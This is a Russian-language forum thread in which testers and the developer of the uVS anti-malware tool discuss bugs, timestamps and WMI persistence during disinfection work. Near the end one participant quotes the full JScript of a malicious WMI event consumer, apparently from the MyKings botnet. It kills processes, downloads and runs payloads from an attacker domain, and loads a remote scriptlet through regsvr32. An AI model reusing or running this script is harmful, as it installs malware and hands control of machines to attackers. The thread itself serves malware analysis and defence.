uVS - Тестирование

[alamor 69]

А неверная кодировка при парсинге настроек мозиллы тоже в этой версии исправлена или пока не успел?

[demkd 638]

59 минут назад, alamor сказал:

А неверная кодировка при парсинге настроек мозиллы тоже в этой версии исправлена или пока не успел?

нет, до этого руки не дошли

[santy 153]

demkd,

посмотри, пожалуйста,

http://www.tehnari.ru/f183/t253600/

здесь тема похожая на все последние атаки, связанные со скачиванием объектов из сети легитимными приложениями, по крайней мере это выглядит так по логам антивирусников (возможно, имеет место быть инъекции вредоносных программ в легитимные процессы)

 

никаких зацепок по WMI обработчикам в образ не попадает.

[demkd 638]

6 часов назад, santy сказал:

посмотри, пожалуйста,

да, тут явно потоки добавляли к процессам, похоже на руткит, так-то ничего необычного не видно.

[PR55.RP55 83]

Несколько моментов.

1) uVS вообще не видит, что: Framework постоянно работает с:  .mof   файлами.

2) Такой момент, как: Короткие и длинные имена файлов.

3) cd /d %windir%/system32/wbem for /r %i in (*.mof *.mfl) do mofcomp %i

 

[PR55.RP55 83]

+

Ну для чего в программе всякая хрень ?

Полное имя                  МАКС\DHGD.PNG
Имя файла                   DHGD.PNG
Тек. статус                 [Запускался неявно или вручную]
                            
Сохраненная информация      на момент создания образа
Статус                      [Запускался неявно или вручную]
                            
Доп. информация             на момент обновления списка
CmdLine                     "C:\WINDOWS\System32\rundll32.exe" "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen C:\Users\Тумашовы\Desktop\рейнджи три макс\dhgd.png

---------------------------

Полное имя                  APP.APPXTK181TBXBCE2QSEX02S8TW7HFXA9XB3T.MCA
Имя файла                   APP.APPXTK181TBXBCE2QSEX02S8TW7HFXA9XB3T.MCA
Тек. статус                 [Запускался неявно или вручную]
                            
Сохраненная информация      на момент создания образа
Статус                      [Запускался неявно или вручную]
                            
Доп. информация             на момент обновления списка
CmdLine                     "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
                            

                            

                            

[PR55.RP55 83]

Фото пример - чего не видит uVS

Последнее изменение файла > Последний доступ к файлу.

 

[demkd 638]

9 часов назад, PR55.RP55 сказал:

1) uVS вообще не видит, что: Framework постоянно работает с:  .mof   файлами.

да и пусть работает, от этого не холодно не жарко

9 часов назад, PR55.RP55 сказал:

2) Такой момент, как: Короткие и длинные имена файлов.

что?

9 часов назад, PR55.RP55 сказал:

3) cd /d %windir%/system32/wbem for /r %i in (*.mof *.mfl) do mofcomp %i

синтаксический анализатор я писать не собираюсь, для этого есть критерии.

8 часов назад, PR55.RP55 сказал:

Ну для чего в программе всякая хрень ?

пусть будет, оно вполне может пригодиться.

57 минут назад, PR55.RP55 сказал:

Последнее изменение файла > Последний доступ к файлу.

uVS использует дату изменения файла, а последний доступ совершенно бесполезен это просто мусор.

[alamor 69]

1) Как в примере выше от @PR55.RP55 разбило путь по пробелу

 

 

 

 

 

2 и 3 не понятно что и почему вывелось

 

 

 

 

 

[PR55.RP55 83]

1 час назад, demkd сказал:

10 часов назад, PR55.RP55 сказал:

 uVS вообще не видит, что: Framework постоянно работает с:  .mof   файлами.

да и пусть работает, от этого не холодно не жарко

Да ?

А если это не Framework  а другая ( системная)  программа, разве что - то  измениться ?

Как uVS не видел так и не будет видеть...

1 час назад, demkd сказал:

uVS использует дату изменения файла, а последний доступ совершенно бесполезен это просто мусор.

А причём здесь изменение ?

В случае, если это скрипт - то его начинка может не меняться месяцами и он будет работать.

А вот время доступа - ( в данном конкретном случае ) имеет значение.

Сразу видно - работали недавно с файлом или нет.

---------

По поводу расширения и статуса объекта. см. фото.

Такие объекты сразу должны попадать в подозрительные.

 

[PR55.RP55 83]

+

А оно надо ?

( xlsx ДанныеДокумент Open XML Microsoft Excel )

----------

Полное имя                  C:\USERS\USER2205\DOCUMENTS\ВОЗВРАТЫ БОНД.XLSX
Имя файла                   ВОЗВРАТЫ БОНД.XLSX
Тек. статус                 [Запускался неявно или вручную]
                            
Сохраненная информация      на момент создания образа
Статус                      [Запускался неявно или вручную]
Размер                      10174 байт
Создан                      16.04.2015 в 09:19:07
Изменен                     16.04.2015 в 09:19:07
Цифр. подпись               Отсутствует либо ее не удалось проверить
                            
Доп. информация             на момент обновления списка
SHA1                        EEDF079668B66BB951FF0883F25E8B225C83155F
MD5                         A5D244FD4F07F43A8E4BEA5680E86D92
                            
Ссылки на объект            
Ссылка                      HKLM\ipwbqyfii\Local Settings\Software\Microsoft\Windows\Shell\MuiCache\C:\USERS\USER2205\DOCUMENTS\ВОЗВРАТЫ БОНД.XLSX
-----------------------

 

[demkd 638]

2 часа назад, alamor сказал:

1) Как в примере выше от @PR55.RP55 разбило путь по пробелу

а оно и должно разбивать, параметры с пробелами передаются в кавычках.
 

3 часа назад, alamor сказал:

2 и 3 не понятно что и почему вывелось

а вот это да, какая-то фигня.

2 часа назад, PR55.RP55 сказал:

Как uVS не видел так и не будет видеть...

и не должен.

2 часа назад, PR55.RP55 сказал:

А вот время доступа - ( в данном конкретном случае ) имеет значение.

время доступа показывает погоду на Марсе.

2 часа назад, PR55.RP55 сказал:

Такие объекты сразу должны попадать в подозрительные.

это да.

[PR55.RP55 83]

36 минут назад, demkd сказал:

время доступа показывает погоду на Марсе.

Пример: на системном диске: _50_ .mof файлов.

Однако в течении 24 часов  доступ был осуществлён только к _7_ из них.
Как по мне, так это важно.
И позволяет уменьшить круг проверки фактически на порядок.
На втором этапе смотрим путь до файла - его размещение и делаем выводы.
Уже на втором этапе файл с нежелательным кодом можно обнаружить с вероятностью > 95%
А вот время создания - это вообще не о чём.
Системное время как дышло - как повернул, так оно и вышло.
На практике доказано - что время создания\изменения легко можно подправить.

Здесь, как раз нужно\важно учитывать все данные.

[demkd 638]

7 часов назад, PR55.RP55 сказал:

Как по мне, так это важно.

А по мне нет, просто потому что зловред mof за собой не оставляет.

7 часов назад, PR55.RP55 сказал:

На практике доказано - что время создания\изменения легко можно подправить.

Как и время "последнего доступа" xD
Да и отключают его обновление разумные люди.

[santy 153]

demkd,

в этом образе есть обработчики WMI,

http://rgho.st/6PQGjS4LW?r=3864

но других угроз судя по образу нет.

каким образом мы можем определить, что эти объекты представляет угрозу?

 

Цитата

Полное имя                  WMI_MSFT_UCSCENARIOCONTROL\MICROSOFT WMI UPDATING CONSUMER SCENARIO CONTROL.[MICROSOFT WMI UPDATING CONSUMER SCENARIO CONTROL]
Имя файла                   MICROSOFT WMI UPDATING CONSUMER SCENARIO CONTROL.[MICROSOFT WMI UPDATING CONSUMER SCENARIO CONTROL]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Consumer_Name               Microsoft WMI Updating Consumer Scenario Control
Consumer_Class              MSFT_UCScenarioControl
Filter_Name                 Microsoft WMI Updating Consumer Scenario Control
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'MSFT_UCScenario'
                            

и

Цитата

Полное имя                  WMI_NTEVENTLOGEVENTCONSUMER\SCM EVENT LOG CONSUMER.[SCM EVENT LOG FILTER]
Имя файла                   SCM EVENT LOG CONSUMER.[SCM EVENT LOG FILTER]
Тек. статус                 в автозапуске
                            
Сохраненная информация      на момент создания образа
Статус                      в автозапуске
                            
Consumer_Name               SCM Event Log Consumer
Consumer_Class              NTEventLogEventConsumer
Filter_Name                 SCM Event Log Filter
Filter_Class                __EventFilter
Filter_Query                select * from MSFT_SCMEventLogEvent
                            

 

[demkd 638]

9 минут назад, santy сказал:

каким образом мы можем определить, что эти объекты представляет угрозу?

по наличию встроенных скриптов (поле ScriptText)
или в этой категории будет скрипт или исполняемый файл.
в данном случае ничего интересного нет.

[santy 153]

судя по этой статье:

http://vinc.top/2017/05/03/windows应急响应（20170503）/

и в частности рисунку:

здесь (ниже по ссылке) видимо таки атака была реализована через wmi, хотя и непонятно почему имя скрипта находилось в секции ярлыков.

http://www.tehnari.ru/f35/t253566/
 

Цитата

 

==================== Shortcuts =============================

(The entries could be listed to be restored or removed.)

WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer:

Shortcut: C:\Users\мы\Desktop\Photoshop - Ярлык.lnk -> D:\Photoshop\Photoshop.exe (Adobe Systems, Incorporated) <===== Cyrillic
Shortcut: C:\Users\мы\Desktop\Steam - Ярлык.lnk -> D:\Steam\Steam.exe (Valve Corporation) <===== Cyrillic
Shortcut: C:\Users\мы\Desktop\WOTLauncher - Ярлык.lnk -> D:\World_of_Tanks\WOTLauncher.exe (Wargaming.net) <===== Cyrillic
Shortcut: C:\Users\мы\Desktop\XR_3DA - Ярлык.lnk -> D:\Games\S.T.A.L.K.E.R\bin\XR_3DA.exe () <===== Cyrillic

 

 

[santy 153]

demkd,

из этой темы запросил лог autoruns

http://www.tehnari.ru/f183/t253600/index7.html

Autorun - IV-DZ-SRV-01.7z

видим, что есть в секции WMI это скрипт. fuckyoumm2_consumer

(Сценарий, встроенный в базу данных WMI)

запросил его содержимое:

Цитата

var toff=3000;var url1 = "хттп://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");for (i = 0; i < arr.length; i++) { t = arr.split(" "); proc = t[0]; path = t[1]; dele = t[2]; wsh.Run("taskkill /f /im " + proc, 0, true);if (dele == 0) { try { fso.DeleteFile(path, true); } catch (e) {} } };var locator=new ActiveXObject("WbemScripting.SWbemLocator");var service=locator.ConnectServer(".","root/cimv2");var colItems=service.ExecQuery("select * from Win32_Process");var e=new Enumerator(colItems);var t1=new Date().valueOf();for(;!e.atEnd();e.moveNext()){var p=e.item();if(p.Caption=="rundll32.exe")p.Terminate()};var t2=0;while(t2-t1<toff){var t2=new Date().valueOf()}var pp=service.get("Win32_Process");var url="хттп://wmi.mykings.top:8888/test.html",http=new ActiveXObject("Microsoft.XMLHTTP"),ado=new ActiveXObject("ADODB.Stream"),wsh=new ActiveXObject("WScript.Shell");for(http.open("GET",url,!1),http.send(),str=http.responseText,arr=str.split("\r\n"),i=0;arr.length>i;i++)t=arr.split(" ",3),http.open("GET",t[0],!1),http.send(),ado.Type=1,ado.Open(),ado.Write(http.responseBody),ado.SaveToFile(t[1],2),ado.Close(),1==t[2]&&wsh.Run(t[1]);pp.create("regsvr32 /s shell32.dll");pp.create("regsvr32 /s WSHom.Ocx");pp.create("regsvr32 /s scrrun.dll");pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");pp.create("regsvr32 /s jscript.dll");pp.create("regsvr32 /u /s /i:хттп://js.mykings.top:280/v.sct scrobj.dll");pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");

но в образе почему то этого нет.  (хотя у него там сканер от дрвеб еще работает уже некоторое время)

IV-DZ-SRV-01_2017-05-12_10-11-00.7z

[demkd 638]

5 часов назад, santy сказал:

из этой темы запросил лог autoruns

посмотрю

[PR55.RP55 83]

13 часов назад, demkd сказал:

А по мне нет, просто потому что зловред mof за собой не оставляет.

Этот может и не оставляет.

А следующий ?

Да и помимо зловредв...   кто знает, какая может быть начинка у файлов.

[PR55.RP55 83]

11 часов назад, santy сказал:

(Сценарий, встроенный в базу данных WMI)

Здесь тот - же скрипт + записи в msconfig

https://forum.drweb.com/index.php?showtopic=327461#entry827106

[PR55.RP55 83]

+

В нескольких темах пишут, что после переустановки системы с форматированием через некоторое время проблема возвращается вновь.

Делаю вывод, что проблема может быть связана с синхронизацией данных браузера Хром.

 

[PR55.RP55 83]

+

Темы:

https://forum.kasperskyclub.ru/index.php?showtopic=55429

https://forum.avast.com/index.php?topic=201822.0

 

[santy 153]

ну, это были только цветочки, а вот и ягодки пошли.

Цитата

Вирус поразил внутреннюю компьютерную систему МВД России, поражены оказались компьютеры сразу в нескольких регионах страны, сообщили "Варламов.ру" несколько источников, знакомых с ситуацией.

Началось массовое заражение криптовирусом сети МВД по стране. Точно уже есть в Липецкой, Пензенской, Калужской областях. На рабочем столе просят 300 баксов. Название вируса @wanadecriptor. На некоторых компах идет отчет до 19 мая.

http://varlamov.ru/2370148.html

[demkd 638]

2 часа назад, santy сказал:

http://varlamov.ru/2370148.html

нашел кого цитировать xD